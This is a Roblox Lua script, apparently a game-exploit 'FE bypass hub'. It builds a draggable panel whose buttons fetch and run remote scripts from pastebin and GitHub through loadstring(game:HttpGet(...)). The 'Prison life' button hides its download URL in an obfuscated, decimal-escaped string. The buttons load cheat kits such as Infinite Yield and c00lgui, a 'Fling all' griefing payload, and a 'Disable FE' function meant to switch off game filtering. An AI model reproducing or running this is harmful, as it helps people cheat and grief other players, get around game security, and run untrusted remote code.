--[=[
 d888b  db    db d888888b      .d888b.      db      db    db  .d8b.  
88' Y8b 88    88   `88'        VP  `8D      88      88    88 d8' `8b 
88      88    88    88            odD'      88      88    88 88ooo88 
88  ooo 88    88    88          .88'        88      88    88 88~~~88 
88. ~8~ 88b  d88   .88.        j88.         88booo. 88b  d88 88   88    @uniquadev
 Y888P  ~Y8888P' Y888888P      888888D      Y88888P ~Y8888P' YP   YP  CONVERTER 
]=]

-- Instances: 26 | Scripts: 12 | Modules: 0 | Tags: 0
local G2L = {};

-- StarterGui.lol
G2L["1"] = Instance.new("ScreenGui", game:GetService("Players").LocalPlayer:WaitForChild("PlayerGui"));
G2L["1"]["Name"] = [[lol]];
G2L["1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;
G2L["1"]["ResetOnSpawn"] = false;


-- StarterGui.lol.Frame
G2L["2"] = Instance.new("Frame", G2L["1"]);
G2L["2"]["BorderSizePixel"] = 2;
G2L["2"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["2"]["Size"] = UDim2.new(0, 475, 0, 237);
G2L["2"]["Position"] = UDim2.new(0.01329, 0, 0.01944, 0);
G2L["2"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.lol.Frame.LocalScript
G2L["3"] = Instance.new("LocalScript", G2L["2"]);



-- StarterGui.lol.Frame.TextLabel
G2L["4"] = Instance.new("TextLabel", G2L["2"]);
G2L["4"]["BorderSizePixel"] = 0;
G2L["4"]["BackgroundColor3"] = Color3.fromRGB(31, 31, 31);
G2L["4"]["TextSize"] = 25;
G2L["4"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["4"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["4"]["Size"] = UDim2.new(0, 474, 0, 50);
G2L["4"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4"]["Text"] = [[FE bypass hub by ThatGodlyBacon]];


-- StarterGui.lol.Frame.Drag
G2L["5"] = Instance.new("LocalScript", G2L["2"]);
G2L["5"]["Name"] = [[Drag]];


-- StarterGui.lol.Frame.ScrollingFrame
G2L["6"] = Instance.new("ScrollingFrame", G2L["2"]);
G2L["6"]["Active"] = true;
G2L["6"]["BorderSizePixel"] = 0;
G2L["6"]["CanvasSize"] = UDim2.new(0, 0, 5, 0);
G2L["6"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6"]["Size"] = UDim2.new(0, 474, 0, 186);
G2L["6"]["ScrollBarImageColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6"]["Position"] = UDim2.new(0, 0, 0.21097, 0);
G2L["6"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6"]["BackgroundTransparency"] = 1;


-- StarterGui.lol.Frame.ScrollingFrame.TextButton
G2L["7"] = Instance.new("TextButton", G2L["6"]);
G2L["7"]["BorderSizePixel"] = 0;
G2L["7"]["TextSize"] = 25;
G2L["7"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["7"]["BackgroundColor3"] = Color3.fromRGB(51, 51, 51);
G2L["7"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["7"]["Size"] = UDim2.new(0, 200, 0, 50);
G2L["7"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["7"]["Text"] = [[Infinite Yield]];


-- StarterGui.lol.Frame.ScrollingFrame.TextButton.LocalScript
G2L["8"] = Instance.new("LocalScript", G2L["7"]);



-- StarterGui.lol.Frame.ScrollingFrame.UIGridLayout
G2L["9"] = Instance.new("UIGridLayout", G2L["6"]);
G2L["9"]["CellSize"] = UDim2.new(0, 150, 0, 50);
G2L["9"]["SortOrder"] = Enum.SortOrder.LayoutOrder;


-- StarterGui.lol.Frame.ScrollingFrame.TextButton
G2L["a"] = Instance.new("TextButton", G2L["6"]);
G2L["a"]["BorderSizePixel"] = 0;
G2L["a"]["TextSize"] = 25;
G2L["a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a"]["BackgroundColor3"] = Color3.fromRGB(51, 51, 51);
G2L["a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["a"]["Size"] = UDim2.new(0, 200, 0, 50);
G2L["a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["a"]["Text"] = [[Fling all]];


-- StarterGui.lol.Frame.ScrollingFrame.TextButton.LocalScript
G2L["b"] = Instance.new("LocalScript", G2L["a"]);



-- StarterGui.lol.Frame.ScrollingFrame.TextButton
G2L["c"] = Instance.new("TextButton", G2L["6"]);
G2L["c"]["BorderSizePixel"] = 0;
G2L["c"]["TextSize"] = 25;
G2L["c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["c"]["BackgroundColor3"] = Color3.fromRGB(51, 51, 51);
G2L["c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["c"]["Size"] = UDim2.new(0, 200, 0, 50);
G2L["c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["c"]["Text"] = [[Prison life]];


-- StarterGui.lol.Frame.ScrollingFrame.TextButton.LocalScript
G2L["d"] = Instance.new("LocalScript", G2L["c"]);



-- StarterGui.lol.Frame.ScrollingFrame.TextButton
G2L["e"] = Instance.new("TextButton", G2L["6"]);
G2L["e"]["BorderSizePixel"] = 0;
G2L["e"]["TextSize"] = 25;
G2L["e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["e"]["BackgroundColor3"] = Color3.fromRGB(51, 51, 51);
G2L["e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["e"]["Size"] = UDim2.new(0, 200, 0, 50);
G2L["e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["e"]["Text"] = [[Disable FE]];


-- StarterGui.lol.Frame.ScrollingFrame.TextButton.LocalScript
G2L["f"] = Instance.new("LocalScript", G2L["e"]);



-- StarterGui.lol.Frame.ScrollingFrame.TextButton
G2L["10"] = Instance.new("TextButton", G2L["6"]);
G2L["10"]["BorderSizePixel"] = 0;
G2L["10"]["TextSize"] = 25;
G2L["10"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["10"]["BackgroundColor3"] = Color3.fromRGB(51, 51, 51);
G2L["10"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["10"]["Size"] = UDim2.new(0, 200, 0, 50);
G2L["10"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["10"]["Text"] = [[OPfinality]];


-- StarterGui.lol.Frame.ScrollingFrame.TextButton.LocalScript
G2L["11"] = Instance.new("LocalScript", G2L["10"]);



-- StarterGui.lol.Frame.ScrollingFrame.TextButton
G2L["12"] = Instance.new("TextButton", G2L["6"]);
G2L["12"]["BorderSizePixel"] = 0;
G2L["12"]["TextSize"] = 25;
G2L["12"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["12"]["BackgroundColor3"] = Color3.fromRGB(51, 51, 51);
G2L["12"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["12"]["Size"] = UDim2.new(0, 200, 0, 50);
G2L["12"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["12"]["Text"] = [[c00lgui FE]];


-- StarterGui.lol.Frame.ScrollingFrame.TextButton.LocalScript
G2L["13"] = Instance.new("LocalScript", G2L["12"]);



-- StarterGui.lol.Frame.ScrollingFrame.TextButton
G2L["14"] = Instance.new("TextButton", G2L["6"]);
G2L["14"]["BorderSizePixel"] = 0;
G2L["14"]["TextSize"] = 25;
G2L["14"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["14"]["BackgroundColor3"] = Color3.fromRGB(51, 51, 51);
G2L["14"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["14"]["Size"] = UDim2.new(0, 200, 0, 50);
G2L["14"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["14"]["Text"] = [[Happy Panel]];


-- StarterGui.lol.Frame.ScrollingFrame.TextButton.LocalScript
G2L["15"] = Instance.new("LocalScript", G2L["14"]);



-- StarterGui.lol.Frame.ScrollingFrame.TextButton
G2L["16"] = Instance.new("TextButton", G2L["6"]);
G2L["16"]["BorderSizePixel"] = 0;
G2L["16"]["TextSize"] = 25;
G2L["16"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["16"]["BackgroundColor3"] = Color3.fromRGB(51, 51, 51);
G2L["16"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["16"]["Size"] = UDim2.new(0, 200, 0, 50);
G2L["16"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["16"]["Text"] = [[R6]];


-- StarterGui.lol.Frame.ScrollingFrame.TextButton.LocalScript
G2L["17"] = Instance.new("LocalScript", G2L["16"]);



-- StarterGui.lol.Frame.ScrollingFrame.TextButton
G2L["18"] = Instance.new("TextButton", G2L["6"]);
G2L["18"]["BorderSizePixel"] = 0;
G2L["18"]["TextSize"] = 25;
G2L["18"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["18"]["BackgroundColor3"] = Color3.fromRGB(51, 51, 51);
G2L["18"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["18"]["Size"] = UDim2.new(0, 200, 0, 50);
G2L["18"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["18"]["Text"] = [[Close GUI]];


-- StarterGui.lol.Frame.ScrollingFrame.TextButton.LocalScript
G2L["19"] = Instance.new("LocalScript", G2L["18"]);



-- StarterGui.lol.LocalScript
G2L["1a"] = Instance.new("LocalScript", G2L["1"]);



-- StarterGui.lol.Frame.LocalScript
local function C_3()
local script = G2L["3"];
	local frame = script.Parent
	local step = 0.01
	
	while true do
		for i = 0, 1, step do
			local r = math.sin(i * math.pi * 2) * 0.5 + 0.5
			local g = math.sin((i + 1/3) * math.pi * 2) * 0.5 + 0.5
			local b = math.sin((i + 2/3) * math.pi * 2) * 0.5 + 0.5
			frame.BorderColor3 = Color3.new(r, g, b)
			wait(0.1)
		end
	end
end;
task.spawn(C_3);
-- StarterGui.lol.Frame.Drag
local function C_5()
local script = G2L["5"];
	local UserInputService = game:GetService("UserInputService")
	
	local gui = script.Parent
	
	local dragging
	local dragInput
	local dragStart
	local startPos
	
	local function update(input)
		local delta = input.Position - dragStart
		gui.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
	end
	
	gui.InputBegan:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
			dragging = true
			dragStart = input.Position
			startPos = gui.Position
			
			input.Changed:Connect(function()
				if input.UserInputState == Enum.UserInputState.End then
					dragging = false
				end
			end)
		end
	end)
	
	gui.InputChanged:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
			dragInput = input
		end
	end)
	
	UserInputService.InputChanged:Connect(function(input)
		if input == dragInput and dragging then
			update(input)
		end
	end)
end;
task.spawn(C_5);
-- StarterGui.lol.Frame.ScrollingFrame.TextButton.LocalScript
local function C_8()
local script = G2L["8"];
	local button = script.Parent
	
	local function infiniteyield()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source"))()
	end
	
	button.MouseButton1Click:Connect(infiniteyield)
end;
task.spawn(C_8);
-- StarterGui.lol.Frame.ScrollingFrame.TextButton.LocalScript
local function C_b()
local script = G2L["b"];
	local button = script.Parent
	
	local function flingall()
		loadstring(game:HttpGet("https://pastebin.com/raw/rvYNTuF8"))()
	end
	
	button.MouseButton1Click:Connect(flingall)
end;
task.spawn(C_b);
-- StarterGui.lol.Frame.ScrollingFrame.TextButton.LocalScript
local function C_d()
local script = G2L["d"];
	local button = script.Parent
	
	local function prisonlife()
		loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\34\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\103\48\48\108\88\112\108\111\105\116\101\114\47\103\48\48\108\88\112\108\111\105\116\101\114\47\109\97\105\110\47\70\101\37\50\48\98\121\112\97\115\115\34\44\32\116\114\117\101\41\41\40\41\10")() 
	end
	
	button.MouseButton1Click:Connect(prisonlife)
end;
task.spawn(C_d);
-- StarterGui.lol.Frame.ScrollingFrame.TextButton.LocalScript
local function C_f()
local script = G2L["f"];
	local function disablefe()
		-- Disable filtering by overwriting the FilterEnabled property
		game:GetService("RunService").Heartbeat:Connect(function()
			local filterService = game:GetService("Filter")
			filterService.FilterEnabled = false
		end)
	
		-- Enable execution of restricted functions
		local function executeRestricted(func)
			local oldError = error
			local newError = function(message)
				-- Intercept and suppress errors
				if message:find("attempt to call a nil value") then
					return
				end
				oldError(message)
			end
	
			-- Temporarily replace the error function
			_G.error = newError
			func()
			_G.error = oldError
		end
	
		-- Example: Execute a restricted function
		executeRestricted(function()
			-- Your forbidden function goes here
			print("Done")
		end)
	end
	
	script.Parent.MouseButton1Click:Connect(disablefe)
end;
task.spawn(C_f);
-- StarterGui.lol.Frame.ScrollingFrame.TextButton.LocalScript
local function C_11()
local script = G2L["11"];
	local function opfinality()
		loadstring(game:HttpGet("https://pastebin.com/raw/zfwJZtDT"))()
	end
	
	script.Parent.MouseButton1Click:Connect(opfinality)
end;
task.spawn(C_11);
-- StarterGui.lol.Frame.ScrollingFrame.TextButton.LocalScript
local function C_13()
local script = G2L["13"];
	local function coolgui()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/supermarioglitc/c00lgui-reborn-v1.1-by-007n7/refs/heads/main/c00lgui%20script.txt"))()
	end
	
	script.Parent.MouseButton1Click:Connect(coolgui)
end;
task.spawn(C_13);
-- StarterGui.lol.Frame.ScrollingFrame.TextButton.LocalScript
local function C_15()
local script = G2L["15"];
	local function executor()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/GithubbingCode/Happy-Panel/refs/heads/main/Code?token=GHSAT0AAAAAACY4FSLAIRUUUSWUVUG5WGMOZZSOAQA"))()
	end
	
	script.Parent.MouseButton1Click:Connect(executor)
end;
task.spawn(C_15);
-- StarterGui.lol.Frame.ScrollingFrame.TextButton.LocalScript
local function C_17()
local script = G2L["17"];
	local button = script.Parent
	
	local function rig()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/GithubbingCode/R6/refs/heads/main/Code"))()
	end
	
	button.MouseButton1Click:Connect(rig)
end;
task.spawn(C_17);
-- StarterGui.lol.Frame.ScrollingFrame.TextButton.LocalScript
local function C_19()
local script = G2L["19"];
	local button = script.Parent
	
	local function close()
		script.Parent.Parent.Parent.Visible = false
	end
	
	button.MouseButton1Click:Connect(close)
end;
task.spawn(C_19);
-- StarterGui.lol.LocalScript
local function C_1a()
local script = G2L["1a"];
	script.Parent.DisplayOrder = 1000
end;
task.spawn(C_1a);

return G2L["1"], require;
